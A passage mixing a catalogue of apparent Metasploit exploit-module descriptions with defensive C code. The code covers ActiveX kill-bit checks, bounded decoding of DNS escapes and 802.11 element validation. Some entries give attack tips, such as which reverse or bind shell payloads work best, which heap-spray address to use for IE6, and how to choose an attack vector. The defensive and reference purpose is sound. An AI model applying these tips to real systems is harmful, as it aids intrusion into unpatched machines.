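                     CLSID_KEY, clsid, CATID_SAFE_FOR_INITIALIZING);
            if (ieq(key, want)) st.safe_for_init = true;
            snprintf(want, sizeof want, "%s%s", COMPAT_KEY, clsid);
            in_compat = ieq(key, want);
        } else if (in_compat && strncmp(line, FLAGS_LINE, sizeof FLAGS_LINE - 1) == 0) {
            st.compat_flags = strtoul(line + sizeof FLAGS_LINE - 1, NULL, 16);
            st.killbit = (st.compat_flags & KILLBIT_FLAG) != 0;
        }
    }
    return st;
}

/* Registry view only: registered, not kill-bitted, and opted into a safety
 * category. A control may also claim safety at runtime via IObjectSafety,
 * which an export cannot show, so a false here means "not proven", not safe. */
bool scriptable_from_browser(const struct control_status *st)
{
    return st->registered && !st->killbit &&
           (st->safe_for_scripting || st->safe_for_init);
}

/* Constructed sample export: two placeholder CLSIDs, the second kill-bitted. */
static const char SAMPLE_REG[] =
    "Windows Registry Editor Version 5.00\r\n\r\n"
    "[HKEY_CLASSES_ROOT\\CLSID\\{11111111-2222-3333-4444-555555555555}]\r\n"
    "@=\"Placeholder Control One\"\r\n\r\n"
    "[HKEY_CLASSES_ROOT\\CLSID\\{11111111-2222-3333-4444-555555555555}\\Implemented Categories\\{7DD95801-9882-11CF-9FA9-00AA006C42C4}]\r\n\r\n"
    "[HKEY_CLASSES_ROOT\\CLSID\\{11111111-2222-3333-4444-555555555555}\\Implemented Categories\\{7DD95802-9882-11CF-9FA9-00AA006C42C4}]\r\n\r\n"
    "[HKEY_CLASSES_ROOT\\CLSID\\{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}]\r\n"
    "@=\"Placeholder Control Two\"\r\n\r\n"
    "[HKEY_CLASSES_ROOT\\CLSID\\{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}\\Implemented Categories\\{7DD95801-9882-11CF-9FA9-00AA006C42C4}]\r\n\r\n"
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}]\r\n"
    "\"Compatibility Flags\"=dword:00000400\r\n";
```

Run it against an export taken with reg.exe from a host and the verdict for each CLSID named in these entries is the difference between "a browser can reach this control" and "it is installed but inert". The kill bit is the mitigation Microsoft's own advisories for third-party controls point to, and it works even while the vulnerable DLL stays on disk.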

XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow
This module exploits a stack buffer overflow in XMPlay 3.3.0.4. The vulnerability is caused due to a boundary error within the parsing of playlists containing an overly long file name. This module uses the ASX file format. CVE-2006-6063 OSVDB-30537 BID-21206 http://secunia.com/advisories...

Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX Control (YVerInfo.dll <= 2006.8.24.1). By sending an overly long string to the "fvCom()" method from a yahoo.com domain, an attacker may be able to execute arbitrary code. CVE-2007-4515 OSVDB-37739 BID-25494 http://labs.idefense.com/inte...

Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249. By sending an overly long string to the "Server()" method, and then calling the "Send()" method, an attacker may be able to execute arbitrary code. The payloads "windows/shell_bind_tcp" and "windows/shell_reverse_tcp" yield the best results. CVE-2007-3147 OSVDB-37082 http://lists.grok.org.uk/pipe...

Zenturi ProgramChecker ActiveX Control Arbitrary File Download.
This module allows remote attackers to place arbitrary files on a user's file system via the Zenturi ProgramChecker sasatl.dll (1.5.0.531) ActiveX Control. CVE-2007-2987 OSVDB-36715 BID-24217

Microsoft RPC DCOM Interface Overflow
This module exploits a stack buffer overflow in the RPCSS service. This vulnerability was originally found by the Last Stage of Delirium research group and has been widely exploited ever since. This module can exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003, all in one request :) CVE-2003-0352 OSVDB-2100 MSB-MS03-026 BID-8205

Microsoft Message Queueing Service Path Overflow
This module exploits a stack buffer overflow in the RPC interface to the Microsoft Message Queueing service. The offset to the return address changes based on the length of the system hostname, so this must be provided via the 'HNAME' option. Much thanks to snort.org and Jean-Baptiste Marchand's excellent MSRPC website. CVE-2005-0059 OSVDB-15458 MSB-MS05-017 BID-13112

Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)
This module exploits a stack buffer overflow in the RPC interface of the Microsoft DNS service. The vulnerability is triggered when a long zone name parameter is supplied that contains escaped octal strings. This module is capable of bypassing NX/DEP protection on Windows 2003 SP1/SP2. CVE-2007-1748 OSVDB-34100 MSB-MS07-029 http://www.microsoft.com/tech...
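The DNS RPC entry above describes the trigger as a long zone name containing escaped octal sequences. The following is an added example for this page and not a reconstruction of Microsoft's extractQuotedChar(): it decodes DNS-style escapes ("\056" for '.', "\\" or "\." for a literal character) into a caller-supplied buffer and shows the checks a decoder of this kind needs, a bound on every output byte including the terminating NUL, exactly three octal digits per escape, rejection of values above 255 and of a trailing backslash. The function name and the three-digit rule are this example's own choices.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Decode DNS-style escapes into out[cap]. "\DDD" (exactly three octal
 * digits) becomes one byte; "\x" for any other x becomes the literal x.
 * Returns the number of bytes written (excluding the NUL), or -1 if the
 * input is malformed or the decoded name would not fit. The bound is
 * checked before every write, which is the check a decoder that copies a
 * long escaped name into a fixed buffer must not skip. */
int decode_escaped_name(const char *in, char *out, size_t cap)
{
    size_t n = 0;
    size_t i = 0;
    while (in[i] != '\0') {
        unsigned char c = (unsigned char)in[i];
        if (c == '\\') {
            char d1 = in[i + 1];
            if (d1 >= '0' && d1 <= '7') {
                /* octal escape: require all three digits, in[i+3] is only
                 * read if in[i+2] was a digit, so we never pass the NUL */
                char d2 = in[i + 2];
                if (!(d2 >= '0' && d2 <= '7'))
                    return -1;
                char d3 = in[i + 3];
                if (!(d3 >= '0' && d3 <= '7'))
                    return -1;
                int v = (d1 - '0') * 64 + (d2 - '0') * 8 + (d3 - '0');
                if (v > 255)
                    return -1;                   /* \400 and up are not a byte */
                c = (unsigned char)v;
                i += 4;
            } else if (d1 != '\0') {
                c = (unsigned char)d1;           /* \. or \\ : literal char */
                i += 2;
            } else {
                return -1;                       /* trailing backslash */
            }
        } else {
            i += 1;
        }
        if (n + 1 >= cap)
            return -1;                           /* no room for byte plus NUL */
        out[n++] = (char)c;
    }
    if (n >= cap)
        return -1;                               /* cap == 0 with empty input */
    out[n] = '\0';
    return (int)n;
}
```

Because every escape shrinks on decoding, the output is never longer than the input, which tempts an implementer into sizing the destination from some other limit and dropping the per-byte check; the length of the escaped input still has to be bounded by the caller, and the destination check stays in regardless.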

Microsoft Message Queueing Service DNS Name Path Overflow
This module exploits a stack buffer overflow in the RPC interface to the Microsoft Message Queueing service. This exploit requires the target system to have been configured with a DNS name and for that name to be supplied in the 'DNAME' option. This name does not need to be served by a valid DNS server, only configured on the target machine. CVE-2007-3039 OSVDB-39123 MSB-MS07-065

Broadcom Wireless Driver Probe Response SSID Overflow
This module exploits a stack buffer overflow in the Broadcom Wireless driver that allows remote code execution in kernel mode by sending an 802.11 probe response that contains a long SSID. The target MAC address must be provided to use this exploit. The two cards tested fell into the 00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information. CVE-2006-5882 OSVDB-30294 http://projects.info-pull.com...

D-Link DWL-G132 Wireless Driver Beacon Rates Overflow
This module exploits a stack buffer overflow in the A5AGU.SYS driver provided with the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow allows remote code execution in kernel mode. The stack buffer overflow is triggered when an 802.11 Beacon frame is received that contains a long Rates information element. This exploit was tested with version 1.0.1.41 of the A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340 adapter and appear to resolve this flaw, but D-Link does not offer an updated driver for the DWL-G132. Since this vulnerability is exploited via beacon frames, all cards within range of the attack will be affected. The tested adapter used a MAC address in the range of 00:11:95:f2:XX:XX. Vulnerable clients will need to have their card in a non-associated state for this exploit to work. The easiest way to reproduce this bug is by starting the exploit and then accessing the Windows wireless network browser and forcing it to refresh. D-Link was NOT contacted about this flaw. A search of the SecurityFocus database indicates that D-Link has not provided an official patch or solution for any of the seven flaws listed at the time of writing: (BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689). As of November 17th, 2006, D-Link has fixed the flaw in the latest version of the DWL-G132 driver (v1.21). This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information. CVE-2006-6055 OSVDB-30296 http://projects.info-pull.com... ftp://ftp.dlink.com/Wireless/...

NetGear WG111v2 Wireless Driver Long Beacon Overflow
This module exploits a stack buffer overflow in the NetGear WG111v2 wireless device driver. This stack buffer overflow allows remote code execution in kernel mode. The stack buffer overflow is triggered when an 802.11 Beacon frame is received that contains more than 1100 bytes worth of information elements. This exploit was tested with version 5.1213.6.316 of the WG111v2.SYS driver and a NetGear WG111v2 USB adapter. Since this vulnerability is exploited via beacon frames, all cards within range of the attack will be affected. The tested adapter used a MAC address in the range of 00:18:4d:02:XX:XX. Vulnerable clients will need to have their card in a non-associated state for this exploit to work. The easiest way to reproduce this bug is by starting the exploit and then unplugging and reinserting the USB card. The exploit can take up to a minute to execute the payload, depending on system activity. NetGear was NOT contacted about this flaw. A search of the SecurityFocus database indicates that NetGear has not provided an official patch or solution for any of the thirty flaws listed at the time of writing. This list includes BIDs: 1010, 3876, 4024, 4111, 5036, 5667, 5830, 5943, 5940, 6807, 7267, 7270, 7371, 7367, 9194, 10404, 10459, 10585, 10935, 11580, 11634, 12447, 15816, 16837, 16835, 19468, and 19973. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information. CVE-2006-5972 OSVDB-30473 http://projects.info-pull.com...
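The three wireless driver entries above (Broadcom, D-Link, NetGear) share one parsing mistake: the driver copies an information element from a beacon or probe response into a buffer sized for what the standard allows (an SSID of at most 32 octets, at most 8 supported rates) when the one-byte length field in the frame allows up to 255, and for the NetGear case the total run of elements is not bounded by the frame at all. The following is an added example for this page, not driver code and not the modules' frame builders: a validator that walks the element list the way a hardened driver or a monitor-mode detector would, plus a builder for constructed test frames. The limits are the 802.11 values; the function names and the rates chosen for the sample are this example's own.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Element IDs and size limits from IEEE 802.11. The length octet of an
 * element allows up to 255, so any buffer sized from these maxima must be
 * guarded by an explicit check on the received length. */
#define IE_SSID            0
#define IE_SUPPORTED_RATES 1
#define SSID_MAX_LEN       32
#define RATES_MAX_LEN      8

/* Validate the information-element list of a beacon or probe response body.
 * 'ies' points at the first element (after the 12 fixed octets of timestamp,
 * beacon interval and capability); 'len' is the number of bytes actually
 * received. Each element is ID (1) | Length (1) | Data (Length). On failure
 * *bad_id is the offending element ID, or -1 when an element's declared
 * length runs past the end of the frame or its header is cut off. */
bool validate_ies(const uint8_t *ies, size_t len, int *bad_id)
{
    size_t off = 0;
    while (off < len) {
        if (off + 2 > len) {                 /* header cut off */
            *bad_id = -1;
            return false;
        }
        uint8_t id   = ies[off];
        uint8_t elen = ies[off + 1];
        if (elen > len - off - 2) {          /* element overruns the frame */
            *bad_id = -1;
            return false;
        }
        if ((id == IE_SSID && elen > SSID_MAX_LEN) ||
            (id == IE_SUPPORTED_RATES && elen > RATES_MAX_LEN)) {
            *bad_id = id;                    /* legal encoding, illegal size */
            return false;
        }
        off += 2u + elen;
    }
    *bad_id = 0;
    return true;
}

/* Build a minimal IE list for testing: an SSID of 'ssid_len' bytes of 'x'
 * followed by Supported Rates 1, 2, 5.5 and 11 Mbit/s (basic-rate bit set).
 * Returns the bytes written, or 0 if the SSID cannot be encoded in a single
 * element or 'cap' is too small. Constructed test data, not a capture. */
size_t build_ies(uint8_t *buf, size_t cap, size_t ssid_len)
{
    static const uint8_t rates[] = { 0x82, 0x84, 0x8b, 0x96 };
    size_t total = 2 + ssid_len + 2 + sizeof rates;
    if (ssid_len > 255 || cap < total)
        return 0;
    buf[0] = IE_SSID;
    buf[1] = (uint8_t)ssid_len;
    memset(buf + 2, 'x', ssid_len);
    buf[2 + ssid_len] = IE_SUPPORTED_RATES;
    buf[3 + ssid_len] = (uint8_t)sizeof rates;
    memcpy(buf + 4 + ssid_len, rates, sizeof rates);
    return total;
}
```

Fed the management frames from a monitor-mode capture (the same Lorcon2 setup these modules require can also sniff), validate_ies() flags exactly the frames these three modules send: an SSID element over 32 bytes, a Rates element over 8, or a list whose declared lengths exceed what was received.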

Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
This module exploits a buffer overflow vulnerability in the LoadAniIcon() function of USER32.dll. The flaw is triggered through Outlook Express by using the CURSOR style sheet directive to load a malicious .ANI file. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee. MSB-MS07-017 CVE-2007-0038 CVE-2007-1765 OSVDB-33629 BID-23194 http://www.microsoft.com/tech... http://www.determina.com/secu... http://www.determina.com/secu...

Outlook ATTACH_BY_REF_ONLY File Execution
It has been discovered that certain e-mail messages cause Outlook to create Windows shortcut-like attachments or messages within Outlook. Through specially crafted TNEF streams with certain MAPI attachment properties, it is possible to set a path name to files to be executed. When a user double-clicks on such an attachment or message, Outlook will proceed to execute the file that is set by the path name value. These files can be local files, but also files stored remotely, for example on a file share. Exploitation is limited by the fact that it is not possible for attackers to supply command line options. MSB-MS10-045 CVE-2010-0266 OSVDB-66296 BID-41446 http://www.akitasecurity.nl/a...

Outlook ATTACH_BY_REF_RESOLVE File Execution
It has been discovered that certain e-mail messages cause Outlook to create Windows shortcut-like attachments or messages within Outlook. Through specially crafted TNEF streams with certain MAPI attachment properties, it is possible to set a path name to files to be executed. When a user double-clicks on such an attachment or message, Outlook will proceed to execute the file that is set by the path name value. These files can be local files, but also files stored remotely, for example on a file share. Exploitation is limited by the fact that it is not possible for attackers to supply command line options. MSB-MS10-045 CVE-2010-0266 OSVDB-66296 BID-41446 http://www.akitasecurity.nl/a...

EMC AlphaStor Agent Buffer Overflow
This module exploits a stack buffer overflow in EMC AlphaStor 3.1. By sending a specially crafted message, an attacker may be able to execute arbitrary code. CVE-2008-2158 OSVDB-45714 http://labs.idefense.com/inte...

ACDSee XPM File Section Buffer Overflow
This module exploits a buffer overflow in ACDSee 9.0. When viewing a malicious XPM file with the ACDSee product, a remote attacker could overflow a buffer and execute arbitrary code. CVE-2007-2193 OSVDB-35236 BID-23620

activePDF WebGrabber ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly. OSVDB-64579 http://www.activepdf.com/prod...

Adobe Collab.collectEmailInfo() Buffer Overflow
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1. By creating a specially crafted PDF that contains a malformed Collab.collectEmailInfo() call, an attacker may be able to execute arbitrary code. CVE-2007-5659 OSVDB-41495

Adobe Flash Player "newfunction" Invalid Pointer Use
This module exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash Player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due to the hardcoded syscall number. CVE-2010-1297 OSVDB-65141 BID-40586 http://www.adobe.com/support/... http://feliam.wordpress.com/2...

Adobe FlateDecode Stream Predictor 02 Integer Overflow
This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2. CVE-2009-3459 BID-36600 OSVDB-58729 http://blogs.adobe.com/psirt/... http://www.adobe.com/support/... http://www.fortiguard.com/ana...

Adobe Collab.getIcon() Buffer Overflow
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted PDF that contains a malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code. CVE-2009-0927 OSVDB-53647 http://www.zerodayinitiative....

Adobe Illustrator CS4 v14.0.0
This module exploits a buffer overflow in Adobe Illustrator CS4 (v14.0.0) triggered by an overlong DSC comment in an Encapsulated PostScript (.eps) file. CVE-2009-4195 BID-37192 OSVDB-60632 http://retrogod.altervista.or... http://www.exploit-db.com/exp...

Adobe JBIG2Decode Memory Corruption Exploit
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon javascript for the heap spray. CVE-2009-0658 OSVDB-52073 http://bl4cksecurity.blogspot...

Adobe Acrobat Bundled LibTIFF Integer Overflow
This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3. CVE-2010-0188 BID-38195 OSVDB-62526 http://www.adobe.com/support/... http://secunia.com/blog/76/ http://bugix-security.blogspo...

Adobe Doc.media.newPlayer Use After Free Vulnerability
This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat Professional versions up to and including 9.2. CVE-2009-4324 BID-37331 OSVDB-60980

Adobe PDF Embedded EXE Social Engineering
This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack. CVE-2010-1240 OSVDB-63667 http://blog.didierstevens.com... http://blog.didierstevens.com... http://blog.didierstevens.com...

Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
This module exploits an array overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.4, < 8.2, and < 9.3. By creating a specially crafted PDF that contains malformed U3D data, an attacker may be able to execute arbitrary code. CVE-2009-3953 OSVDB-61690 http://www.adobe.com/support/...

Adobe util.printf() Buffer Overflow
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted PDF that contains a malformed util.printf() entry, an attacker may be able to execute arbitrary code. CVE-2008-2992 OSVDB-49520

Altap Salamander 2.5 PE Viewer Buffer Overflow
This module exploits a buffer overflow in Altap Salamander <= v2.5. By creating a malicious file and convincing a user to view the file with the Portable Executable Viewer plugin within a vulnerable version of Salamander, the PDB file string is copied onto the stack and the SEH can be overwritten. CVE-2007-3314 BID-24557 OSVDB-37579 http://vuln.sg/salamander25-e...

AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow
This module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5. By setting an overly long value to 'Import()', an attacker can overrun a buffer and execute arbitrary code. NOTE: This ActiveX control is NOT marked safe for scripting or initialization. OSVDB-61964 http://www.exploit-db.com/exp... http://www.rec-sec.com/2010/0...

Audio Workstation 6.4.2.4.3 pls Buffer Overflow
This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3. When opening a malicious pls file with the Audio Workstation, a remote attacker could overflow a buffer and execute arbitrary code. CVE-2009-0476 OSVDB-55424 http://www.exploit-db.com/exp...

Audiotran 1.4.1 (PLS File) Stack Buffer Overflow
This module exploits a stack-based buffer overflow in Audiotran 1.4.1. An attacker must send the file to the victim, and the victim must open the file. Alternatively, it may be possible to execute code remotely via an embedded PLS file within a browser when the PLS extension is registered to Audiotran. This functionality has not been tested in this module. CVE-2009-0476 OSVDB-55424 http://www.exploit-db.com/exp...

BlazeDVD 5.1 PLF Buffer Overflow
This module exploits a stack overflow in BlazeDVD 5.1. When the application is used to open a specially crafted PLF file, a buffer is overwritten, allowing for the execution of arbitrary code. CVE-2006-6199 OSVDB-30770 BID-35918

CA Antivirus Engine CAB Buffer Overflow
This module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637. By creating a specially crafted CAB file, an attacker may be able to execute arbitrary code. CVE-2007-2864 OSVDB-35245 BID-24330 http://www.zerodayinitiative....

Cain & Abel <= v4.9.24 RDP Buffer Overflow
This module exploits a stack-based buffer overflow in Cain & Abel v4.9.24 and below. An attacker must send the file to the victim, and the victim must open the specially crafted RDP file under Tools -> Remote Desktop Password Decoder. CVE-2008-5405 OSVDB-50342 http://www.milw0rm.com/exploi... BID-32543

AstonSoft DeepBurner (DBR File) Path Buffer Overflow
This module exploits a stack-based buffer overflow in versions 1.9.0.228, 1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc). An attacker must send the file to the victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded DBR file within a browser, since the DBR extension is registered to DeepBurner. BID-21657 OSVDB-32356 CVE-2006-6665 http://milw0rm.com/exploits/2950 http://milw0rm.com/exploits/8335 http://www.exploit-db.com/exp...

Destiny Media Player 1.61 PLS M3U Buffer Overflow
This module exploits a stack-based buffer overflow in the Destiny Media Player 1.61. An attacker must send the file to the victim and the victim must open the file via File-->Open Playlist. CVE-2009-3429 OSVDB-53249 http://www.milw0rm.com/exploi... BID-33091

DjVu DjVu_ActiveX_MSOffice.dll ActiveX Component Buffer Overflow
This module exploits a stack buffer overflow in DjVu ActiveX Component. When sending an overly long string to the ImageURL() property of DjVu_ActiveX_MSOffice.dll (3.0) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly. CVE-2008-4922 OSVDB-49592 BID-31987

EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the KeyWorks KeyHelp ActiveX Control (KeyHelp.ocx 1.2.3120.0). This ActiveX Control comes bundled with EMC's Documentation ApplicationXtender 5.4. OSVDB-58423 BID-36546

CA eTrust PestPatrol ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in CA eTrust PestPatrol. When sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary code. CVE-2009-4225 OSVDB-60862 http://www.my-etrust.com/Exte...

Free Download Manager Torrent Parsing Buffer Overflow
This module exploits a stack buffer overflow in Free Download Manager 3.0 Build 844. Arbitrary code execution could occur when parsing a specially crafted torrent file. CVE-2009-0184 OSVDB-54033 BID-33555 http://freedownload.svn.sourc... http://freedownload.svn.sourc... http://secunia.com/secunia_re... http://downloads.securityfocu...

FeedDemon <= 3.1.0.12 Stack Buffer Overflow
This module exploits a buffer overflow in FeedDemon v3.1.0.12. When the application is used to import a specially crafted opml file, a buffer overflow occurs allowing arbitrary code execution. All versions are suspected to be vulnerable. This vulnerability was originally reported against version 2.7 in February of 2009. CVE-2009-0546 OSVDB-51753 BID-33630 http://www.exploit-db.com/exp... http://www.exploit-db.com/exp... http://www.exploit-db.com/exp...

gAlan 0.2.1 Buffer Overflow Exploit
This module exploits a stack buffer overflow in gAlan 0.2.1. By creating a specially crafted galan file, an attacker may be able to execute arbitrary code. OSVDB-60897 http://www.exploit-db.com/exp...

HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
This module exploits a stack buffer overflow in HTML Help Workshop 4.74. By creating a specially crafted hhp file, an attacker may be able to execute arbitrary code. CVE-2006-0564 OSVDB-22941 http://www.exploit-db.com/exp... http://www.exploit-db.com/exp...

HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
This module exploits a stack buffer overflow in HTML Help Workshop 4.74. By creating a specially crafted hhp file, an attacker may be able to execute arbitrary code. CVE-2009-0133 BID-33189 OSVDB-22941 http://www.exploit-db.com/exp... http://www.exploit-db.com/exp...

HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow
This module exploits a stack buffer overflow in HT-MP3Player 1.0. Arbitrary code execution could occur when parsing a specially crafted .HT3 file. NOTE: The player installation does not register the file type to be handled. Therefore, a user must take extra steps to load this file. CVE-2009-2485 OSVDB-55449 http://www.milw0rm.com/exploi... http://www.milw0rm.com/exploi...

PointDev IDEAL Migration Buffer Overflow
This module exploits a stack buffer overflow in versions v9.7 through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of IDEAL Migration. All versions are suspected to be vulnerable. By creating a specially crafted ipj file, an attacker may be able to execute arbitrary code. NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH. CVE-2009-4265 OSVDB-60681 http://www.exploit-db.com/exp... http://www.exploit-db.com/exp... http://www.exploit-db.com/exp... http://www.exploit-db.com/exp...

McAfee Remediation Client ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in McAfee Remediation Agent 4.5.0.41. When sending an overly long string to the DeleteSnapshot() method of enginecom.dll (3.7.0.9) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly. http://www.metasploit.com

Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)
This module exploits a stack buffer overflow in Media Jukebox 8.0.400. By creating a specially crafted m3u or pls file, an attacker may be able to execute arbitrary code. OSVDB-55924 CVE-2009-2650

Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow
This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0. An attacker must send the file to the victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extension is registered to Millenium MP3 Studio. This functionality has not been tested in this module. OSVDB-56574 http://www.exploit-db.com/exp... http://www.exploit-db.com/exp...

Mini-Stream 3.0.1.1 Buffer Overflow Exploit
This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1. By creating a specially crafted pls file, an attacker may be able to execute arbitrary code. OSVDB-61341 http://www.exploit-db.com/exp...

Microsoft Excel Malformed FEATHEADER Record Vulnerability
This module exploits a vulnerability in the handling of the FEATHEADER record by Microsoft Excel. Revisions of Office XP and later prior to the release of the MS09-067 bulletin are vulnerable. When processing a FEATHEADER (Shared Feature) record, Microsoft used a data structure from the file to calculate a pointer offset without doing proper validation. Attacker supplied data is then used to calculate the location of an object, and in turn a virtual function call. This results in arbitrary code execution. NOTE: On some versions of Office, the user will need to dismiss a warning dialog prior to the payload executing. CVE-2009-3129 OSVDB-59860 MSB-MS09-067 BID-36945 http://www.zerodayinitiative.... http://labs.idefense.com/inte...

Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow
This module exploits a stack buffer overflow vulnerability in the handling of the TextBytesAtom records by Microsoft PowerPoint Viewer. According to Microsoft, the PowerPoint Viewer distributed with Office 2003 SP3 and earlier, as well as Office 2004 for Mac, are vulnerable. NOTE: The vulnerable code path is not reachable on versions of Windows prior to Windows Vista. CVE-2010-0033 OSVDB-62241 MSB-MS10-004 http://www.zerodayinitiative.... http://www.snoop-security.com...

Microsoft Visual Basic VBP Buffer Overflow
This module exploits a stack overflow in Microsoft Visual Basic 6.0. When a specially crafted vbp file containing a long reference line is opened, an attacker may be able to execute arbitrary code. CVE-2007-4776 OSVDB-36936 BID-25629

Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit
The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker to execute arbitrary code on a system. By passing a negative integer to the WksPictureInterface method, an attacker could execute arbitrary code on the system with privileges of the victim. Change 168430090 / 0x0A0A0A0A to 202116108 / 0x0C0C0C0C for IE6. This control is not marked safe for scripting, please choose your attack vector carefully. CVE-2008-1898 OSVDB-44458

Steinberg MyMP3Player 3.0 Buffer Overflow
This module exploits a stack buffer overflow in Steinberg MyMP3Player == 3.0. When the application is used to open a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution. OSVDB-64580 http://www.exploit-db.com/exp...

Orbital Viewer ORB File Parsing Buffer Overflow
This module exploits a stack-based buffer overflow in David Manthey's Orbital Viewer. When processing .ORB files, data is read from file into a fixed-size stack buffer using the fscanf function. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an ORB file. BID-38436 OSVDB-62580 CVE-2010-0688 http://www.corelan.be:8800/in... http://www.exploit-db.com/exp...

ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow
This module exploits a stack-based buffer overflow in ProShow Gold v4.0.2549. An attacker must send the file to the victim and the victim must open the file. CVE-2009-3214 OSVDB-57226 http://www.exploit-db.com/exp... http://www.exploit-db.com/exp...

SafeNet SoftRemote GROUPNAME Buffer Overflow
This module exploits a stack buffer overflow in SafeNet SoftRemote Security Policy Editor <= 10.8.5. When an attacker creates a specially formatted security policy with an overly long GROUPNAME argument, it is possible to execute arbitrary code. CVE-2009-3861 OSVDB-59660 http://www.senseofsecurity.co...

SasCam Webcam Server v.2.6.5 Get() method Buffer Overflow
The SasCam Webcam Server ActiveX control is vulnerable to a buffer overflow. By passing an overly long argument via the Get method, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the user. This control is not marked safe for scripting, please choose your attack vector carefully. CVE-2008-6898 OSVDB-55945 BID-33053

S.O.M.P.L 1.0 Player Buffer Overflow
This module exploits a buffer overflow in Simple Open Music Player v1.0. When the application is used to import a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution. OSVDB-64368 http://www.exploit-db.com/exp...

UltraISO CCD File Parsing Buffer Overflow
This module exploits a stack-based buffer overflow in EZB Systems, Inc's UltraISO. When processing .CCD files, data is read from file into a fixed-size stack buffer. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open a CCD file. NOTE: A file with the same base name, but the extension of "img" must also exist. Opening either file will trigger the vulnerability, but the files must both exist. CVE-2009-1260 OSVDB-53275 BID-34363 BID-38613 http://www.exploit-db.com/exp...

UltraISO CUE File Parsing Buffer Overflow
